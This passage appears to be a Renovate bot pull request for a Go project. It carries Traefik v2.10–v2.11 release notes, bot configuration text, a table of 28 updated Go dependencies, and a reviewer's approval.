• [docker,marathon,rancher,ecs,tls,nomad] Allow to configure TLSStore default generated certificate with labels (#​10439 by kevinpollet)
• [ecs] Adjust ECS network interface detection logic (#​10550 by amaxine)
• [logs,tls] Fix log when default TLSStore and TLSOptions are defined multiple times (#​10499 by rtribotte)
• [middleware] Allow empty replacement with ReplacePathRegex middleware (#​10538 by rtribotte)
• [plugins] Update Yaegi to v0.16.1 (#​10565 by ldez)
• [provider,rules] Don't allow routers higher than internal ones (#​10428 by ldez)
• [rules] Reserve priority range for internal routers (#​10541 by youkoulayley)
• [server,tcp] Introduce Lingering Timeout (#​10569 by rtribotte)
• [tcp] Enforce failure for TCP HostSNI with hostname (#​10540 by youkoulayley)
• [tracing] Bump Elastic APM to v2.4.8 (#​10512 by rtribotte)
• [webui] Fix dashboard exposition through a router (#​10518 by mmatur)
• [webui] Display IPAllowlist middleware configuration in dashboard (#​10459 by youkoulayley)
• [webui] Make text more readable in dark mode (#​10473 by hood)
• [webui] Migrate to Quasar 2.x and Vue.js 3.x (#​10416 by andsarr)
• [webui] Add a horizontal scroll for the mobile view (#​10480 by framebassman)

Documentation:

• [acme] Update gandiv5 env variable in providers table (#​10506 by dominiwe)
• [acme] Fix multiple dns provider documentation (#​10496 by mmatur)
• [docker] Fix paragraph in entrypoints and Docker docs (#​10491 by luigir-it)
• [k8s] Improve middleware example (#​10532 by mloiseleur)
• [metrics] Fix host header mention in prometheus metrics doc (#​10502 by MorphBonehunter)
• [metrics] Fix typo in statsd metrics docs (#​10437 by xpac1985)
• [middleware] Improve excludedIPs example with IPWhiteList and IPAllowList middleware (#​10554 by mloiseleur)
• [nomad] Improve documentation about Nomad ACL minimum rights (#​10482 by Thadir)
• [server] Add specification for TCP TLS routers in documentation (#​10510 by shivanipawar00)
• [tls] Fix default value for peerCertURI option (#​10470 by marcmognol)
• Update releases page (#​10449 by ldez)
• Update releases page (#​10443 by ldez)
• Add youkoulayley to maintainers (#​10517 by emilevauge)
• Add sdelicata to maintainers (#​10515 by emilevauge)

Misc:

• [webui] Modify the Hub Button (#​10583 by mdeliatf)

v2.11.0

Compare Source

All Commits

Enhancements:

• [middleware] Deprecate IPWhiteList middleware in favor of IPAllowList (#​10249 by lbenguigui)
• [redis] Add Redis Sentinel support (#​10245 by youkoulayley)
• [server] Add KeepAliveMaxTime and KeepAliveMaxRequests features to entrypoints (#​10247 by juliens)
• [sticky-session] Hash WRR sticky cookies (#​10243 by youkoulayley)

Bug fixes:

• [acme] Update go-acme/lego to v4.15.0 (#​10392 by ldez)
• [authentication] Fix NTLM and Kerberos (#​10405 by juliens)
• [file] Fix file watcher (#​10420 by juliens)
• [file] Update github.com/fsnotify/fsnotify to v1.7.0 (#​10313 by ldez)
• [http3] Update quic-go to v0.40.1 (#​10296 by ldez)
• [middleware,tcp] Add missing TCP IPAllowList middleware constructor (#​10331 by youkoulayley)
• [nomad] Update the Nomad API dependency to v1.7.2 (#​10327 by jrasell)
• [server] Fix ReadHeaderTimeout for PROXY protocol (#​10320 by juliens)
• [webui] Fixes the Header Button (#​10395 by mdeliatf)
• [webui] Fix URL encode resource's id before calling API endpoints (#​10292 by andsarr)

Documentation:

• [acme] Fix TLS challenge explanation (#​10293 by cavokz)
• [docker] Update wording of compose example (#​10276 by svx)
• [docker,acme] Fix typo (#​10294 by youpsla)
• [ecs] Mention ECS as supported backend (#​10393 by aleyrizvi)
• [k8s/crd] Adjust deprecation notice for Kubernetes CRD provider (#​10317 by rtribotte)
• [middleware] Update the documentation for RateLimit to provide a better example (#​10298 by rmburton)
• [server] Fix the keepAlive options for the CLI examples (#​10398 by immanuelfodor)
• Prepare release v2.11.0-rc2 (#​10384 by rtribotte)
• Improve Concepts documentation page (#​10315 by oliver-dvorski)
• Prepare release v2.11.0-rc1 (#​10326 by mmatur)
• Fix description for anonymous usage statistics references (#​10287 by ariyonaty)
• Documentation enhancements (#​10261 by svx)

v2.10.7

Compare Source

All Commits

Bug fixes:

• [logs] Fixed datadog logs json format issue (#​10233 by sssash18)

v2.10.6

Compare Source

All Commits

Bug fixes:

• [acme] Remove backoff for http challenge (#​10224 by youkoulayley)
• [consul,consulcatalog] Update github.com/hashicorp/consul/api (#​10220 by kevinpollet)
• [http3] Update quic-go to v0.39.1 (#​10171 by tomMoulard)
• [middleware] Fix stripPrefix middleware is not applied to retried attempts ([#​10255](htt

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 28 additional dependencies were updated
• The go directive was updated for compatibility reasons

Details:

Package	Change
go	1.19 -> 1.23.1
github.com/cloudflare/cloudflare-go	v0.57.1 -> v0.97.0
github.com/sirupsen/logrus	v1.9.0 -> v1.9.3
k8s.io/apimachinery	v0.26.2 -> v0.26.3
k8s.io/client-go	v0.26.2 -> v0.26.3
github.com/davecgh/go-spew	v1.1.1 -> v1.1.2-0.20180830191138-d8f796af33cc
github.com/emicklei/go-restful/v3	v3.9.0 -> v3.11.0
github.com/go-logr/logr	v1.2.3 -> v1.4.1
github.com/golang/protobuf	v1.5.2 -> v1.5.4
github.com/google/go-cmp	v0.5.9 -> v0.6.0
github.com/gorilla/mux	v1.8.0 -> v1.8.1
github.com/hashicorp/go-retryablehttp	v0.7.1 -> v0.7.7
github.com/imdario/mergo	v0.3.12 -> v0.3.16
github.com/jonboulle/clockwork	v0.2.2 -> v0.4.0
github.com/miekg/dns	v1.1.50 -> v1.1.59
github.com/traefik/paerser	v0.2.0 -> v0.2.1
golang.org/x/crypto	v0.5.0 -> v0.26.0
golang.org/x/mod	v0.6.0 -> v0.18.0
golang.org/x/net	v0.7.0 -> v0.26.0
golang.org/x/oauth2	v0.4.0 -> v0.21.0
golang.org/x/sys	v0.5.0 -> v0.23.0
golang.org/x/term	v0.5.0 -> v0.23.0
golang.org/x/text	v0.7.0 -> v0.17.0
golang.org/x/time	v0.3.0 -> v0.5.0
golang.org/x/tools	v0.2.0 -> v0.22.0
google.golang.org/protobuf	v1.28.1 -> v1.33.0
k8s.io/api	v0.26.2 -> v0.26.3
k8s.io/klog/v2	v2.80.1 -> v2.90.1
k8s.io/utils	v0.0.0-20221107191617-1a15be271d1d -> v0.0.0-20230313181309-38a27ef9d749

[gi8lino]

LGTM